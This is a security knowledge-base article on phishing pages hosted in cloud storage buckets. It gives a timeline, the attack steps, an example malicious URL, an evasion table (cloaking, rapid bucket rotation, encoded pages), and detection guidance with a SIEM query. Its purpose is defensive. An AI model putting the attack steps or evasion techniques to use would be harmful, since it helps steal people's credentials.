Cloud Storage Phishing Hosting
Hosting phishing pages on trusted cloud storage (GCS, S3, Azure Blob) to bypass URL reputation filters; still active but detection improving.
MITRE ATT&CK: T1566.002Timeline: The Cat and Mouse
2017 â Attack emerges â 2020 â Defenses improve â 2023 â Shifting to serverless â Present
The Evolution
| Phase | Period | What Happened |
|---|---|---|
| ATTACK | 2017 | GCS/S3-hosted phishing exploits trusted domain reputation |
| PEAK | 2018-2019 | Mass adoption; filters not inspecting bucket paths |
| RESPONSE | 2019 | Cloud providers add abuse scanning for public buckets |
| Â | 2020 | SEGs add full-path URL inspection |
| Â | 2022 | Real-time content analysis at delivery |
| DECLINE | 2023+ | Sophisticated attackers shift to Cloudflare Workers, compromised sites |
| CURRENT | Present | Still works with rapid rotation; detection significantly improved |
Key Events with Sources
| Date | Event | Significance | Source |
|---|---|---|---|
| 2017 | Cloud storage phishing emerges | Attackers discover googleapis.com bypasses URL filters | Proofpoint |
| 2019 | Azure Blob O365 phishing | Microsoftâs own infrastructure hosting O365 phishing | Netskope |
| 2019 | Google Cloud abuse scanning | GCS adds automated phishing content detection | Google Cloud |
| 2020 | Full-path URL inspection | SEGs analyze bucket names and file patterns | Proofpoint |
| 2022 | Real-time content analysis | Advanced gateways fetch and analyze pages before delivery | Mimecast |
Overview
Attackers host phishing pages on legitimate cloud storage services instead of their own infrastructure. Victims see trusted domains like storage.googleapis.com in the URL, and security filters are reluctant to block major cloud providers entirely.
The Attack
How It Worked
- Attacker creates a cloud storage bucket (GCS, S3, Azure Blob) with public read access
- Uploads phishing HTML page mimicking target brand (Office 365, PayPal, banking, etc.)
- Sends phishing email with link to
storage.googleapis.com/[bucket-name]/login.html - Victim sees a Google/Amazon/Microsoft domain, assumes itâs safe
- Victim enters credentials, which POST to attacker-controlled server
- Attacker harvests credentials
Technical Details
Cloud storage services serve files with appropriate Content-Type headers based on file extension:
.htmlâContent-Type: text/htmlâ Browser renders as webpage.jsâContent-Type: application/javascriptâ Browser executes.cssâContent-Type: text/cssâ Browser applies styles
This means an attacker can host a fully functional phishing pageâcomplete with JavaScript for form validation and credential exfiltrationâon âtrustedâ infrastructure.
Example malicious URL:
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
The bucket name hqyoqzatqthj is random gibberishâa red flag if you know to look for it, but invisible to users who only see âgoogleapis.com.â
Why It Worked
- Domain reputation â URL filters scored
googleapis.comas trusted - User trust â Users trained to âlook for HTTPSâ saw valid Google certificate
- Blocking difficulty â Canât block cloud storage wholesale without breaking legitimate use
- Anonymity â Easy to spin up, no infrastructure to trace
- Speed â New bucket in seconds, campaign running in minutes
Notable Campaigns
- Office 365 Phishing Wave (2019) â Massive campaign using Azure Blob storage; Microsoftâs own infrastructure hosting O365 phishing
- COVID-19 Lures (2020) â Health organization spoofs hosted on GCS during pandemic
- Banking Campaigns (Ongoing) â Persistent abuse across all major cloud providers
How The Defenses Work
Cloud Provider Abuse Scanning (2019+)
Cloud providers scan uploaded content for phishing patterns:
- Known brand logos (Microsoft, PayPal, banks)
- Credential harvesting forms
- Suspicious JavaScript patterns
Malicious buckets get flagged and taken downâthough often hours after the campaign started.
Full-Path URL Inspection (2020+)
Instead of just asking âis googleapis.com safe?â, security tools now analyze:
- Is the bucket name random gibberish?
- Does the path contain
login.html,verify.html,secure.html? - Does the HTML contain login forms for brands the bucket owner doesnât control?
Real-Time Content Analysis (2022+)
Advanced Secure Email Gateways fetch the destination URL at scan time and analyze:
- Page content and structure
- Form actions (where do credentials POST?)
- Brand impersonation signals
- Behavioral patterns (redirects, JavaScript obfuscation)
Attacker Adaptation
Attackers evolved several counter-techniques:
| Evasion | Description |
|---|---|
| Rapid rotation | Use bucket for hours, abandon before takedown |
| Legitimate-sounding names | microsoft-support-docs instead of xj7yhq9 |
| Redirect chains | Cloud storage redirects to actual phishing page elsewhere |
| Cloaking | Serve different content to security scanners vs. real users |
| Encrypted/obfuscated content | Base64-encoded pages that decode client-side |
Sophisticated attackers have largely moved to more evasive hosting:
- Cloudflare Workers â Serverless functions, even harder to inspect
- Compromised legitimate sites â Real business domains with good reputation
- URL shorteners â Hide the destination entirely
Current State
Status: đĄ Limited Effectiveness
Still seen regularly in the wild, but detection has improved significantly. Success factors:
| Works When | Fails When |
|---|---|
| Attacker uses believable bucket names | Random gibberish bucket names |
| Campaign is short-lived (hours) | Campaign runs for days |
| Target org has basic email filtering | Target has advanced URL analysis |
| Target users arenât security-aware | Users trained to inspect URLs |
Detection Guidance
Email Indicators
Look for emails containing:
storage.googleapis.comURLss3.amazonaws.comURLsblob.core.windows.netURLs- Any cloud storage URL pointing to
.htmlfiles
URL Red Flags
- Bucket names that are random strings
- Bucket names that donât match the claimed sender
- Cloud storage hosting HTML (legitimate use is typically media/documents)
- Query parameters with tracking tokens or encoded data
User Reports
Train users to report:
- âLogin pagesâ hosted on cloud storage
- Brand impersonation on Google/Amazon/Microsoft domains
- Emails from unknown senders with cloud storage links
SIEM Queries
If youâre ingesting email logs, alert on:
url.domain:("storage.googleapis.com" OR "s3.amazonaws.com" OR "blob.core.windows.net")
AND url.path:*.html
What Killed It (or Weakened It)
| Defense | Introduced | Impact |
|---|---|---|
| Cloud Provider Abuse Scanning | 2019 | Automated detection of phishing content in public buckets |
| Full-Path URL Inspection | 2020 | SEGs analyze bucket names and file patterns, not just domain |
| Real-Time Content Analysis | 2022 | Fetch and analyze page content before email delivery |